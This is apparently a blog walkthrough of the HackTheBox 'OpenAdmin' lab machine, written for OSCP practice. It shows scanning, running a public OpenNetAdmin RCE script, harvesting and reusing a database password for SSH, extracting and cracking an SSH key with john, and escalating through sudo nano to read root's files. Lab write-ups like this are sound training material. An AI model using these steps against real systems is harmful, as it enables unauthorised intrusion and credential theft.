Posts Hackthebox OpenAdmin
Post
Cancel

Hackthebox OpenAdmin

May 2, 2020 2020-05-02T15:33:00+03:00 on OSCP Preparation Hackthebox

Desktop View

This post provides a walkthrough of the OpenAdmin system on HackTheBox. It is an easy linux machine.

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

nmap -A -T4 -oA openadmin 10.10.10.171 
Nmap scan report for 10.10.10.171 
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/30%OT=22%CT=1%CU=31355%PV=Y%DS=2%DC=I%G=Y%TM=5EAAB22
OS:5%P=x86_64-apple-darwin17.7.0)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)SE
OS:Q(SP=10B%GCD=1%ISR=10D%TI=Z%TS=A)SEQ(SP=109%GCD=1%ISR=10C%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O
OS:5=M54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)ECN(R=N)T1(R=Y%DF=Y%
OS:T=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=N)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T5(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=N)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=40%CD=S)IE(R=N)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 30 14:10:29 2020 -- 1 IP address (1 host up) scanned in 107.10 seconds

Services are http and ssh. The web server just has the default page . I ran dirbuster.

Desktop View

I saw /ona/ directory. Its like that.

Desktop View

In here important thing is OpenNetAdmin v18.1.1. I searched OpenNetAdmin v18.1.1 exploits. I found this RCE and access the system.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

~/Desktop/htb/openadmin » bash 47691.sh  http://10.10.10.171/ona/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -la
drwxrwxr-x 10 www-data www-data 4096 Nov 22 17:17 .
drwxr-x---  7 www-data www-data 4096 Nov 21 18:23 ..
-rw-rw-r--  1 www-data www-data 1970 Jan  3  2018 .htaccess.example
drwxrwxr-x  2 www-data www-data 4096 Jan  3  2018 config
-rw-rw-r--  1 www-data www-data 1949 Jan  3  2018 config_dnld.php
-rw-rw-r--  1 www-data www-data 4160 Jan  3  2018 dcm.php
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 images
drwxrwxr-x  9 www-data www-data 4096 Jan  3  2018 include
-rw-rw-r--  1 www-data www-data 1999 Jan  3  2018 index.php
drwxrwxr-x  5 www-data www-data 4096 Jan  3  2018 local
-rw-rw-r--  1 www-data www-data 4526 Jan  3  2018 login.php
-rw-rw-r--  1 www-data www-data 1106 Jan  3  2018 logout.php
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 modules
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 plugins
drwxrwxr-x  2 www-data www-data 4096 Jan  3  2018 winc
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 workspace_plugins

In this directory there was some of important config files.

1
2
3
4
5
6

$ ls -la config/
total 24
drwxrwxr-x  2 www-data www-data 4096 Jan  3  2018 .
drwxrwxr-x 10 www-data www-data 4096 Nov 22 17:17 ..
-rw-rw-r--  1 www-data www-data 1905 Jan  3  2018 auth_ldap.config.php
-rw-rw-r--  1 www-data www-data 9983 Jan  3  2018 config.inc.php

config.inc.php contains some useful information.

1
2

// Include the localized Database settings                                               
$dbconffile = "{$base}/local/config/database_settings.inc.php";

I found a password in local/config/database_settings.inc.php.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);
?>

We know the ssh port open and users on the system.ssh creds is jimmy:n1nj4W4rri0R!.

Desktop View

The www-data user didn’t have access to this /var/www/internal/ folders but jimmy has.

1
2
3

jimmy@openadmin:/var/www$ cd internal/
jimmy@openadmin:/var/www/internal$ ls
index.php  logout.php  main.php

main.php is interesting :)

1
2
3
4
5
6
7
8
9
10

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

The web server print’s user joanna's RSA key. We can use curl.

Desktop View

Get a 404 Not Found. We can see local open ports with netstat.

Desktop View

When I try the 52846 port. I got the rsa key.

Desktop View

Accessing with joanna. We can crack this key with using john. But first we need to modified id_rsa. For this we should use ssh2john.py script.

1
2

 python /usr/share/john/ssh2john.py  id_rsa > hash
 john --wordlist=rockyou.txt hash

john output like that.

Desktop View

passphrase for key 'id_rsa' is bloodninjas. Access the box and getting user flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

~/Desktop/htb/openadmin » ssh -i id_rsa joanna@10.10.10.171
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Apr 30 15:27:47 UTC 2020

  System load:  0.0               Processes:             115
  Usage of /:   49.6% of 7.81GB   Users logged in:       0
  Memory usage: 18%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Apr 30 13:59:42 2020 from 10.10.14.3
joanna@openadmin:~$

User Flag Desktop View

Privilege Escalation

sudo -l lists which commands user can run without a superuser password.

Desktop View

We can only run the preinstalled nano on a specific file, /opt/priv.

1

sudo -u root  /bin/nano /opt/priv

nano has a handy command at the bottom for reading files.

Desktop View

We can read root.txt in this method.

Desktop View

Root Flag

Desktop View

Desktop View

hackthebox oscp
This post is licensed under CC BY 4.0

Trending Tags

oscp hackthebox

Contents

Hackthebox Control

Hackthebox Obscurity

Trending Tags

oscp hackthebox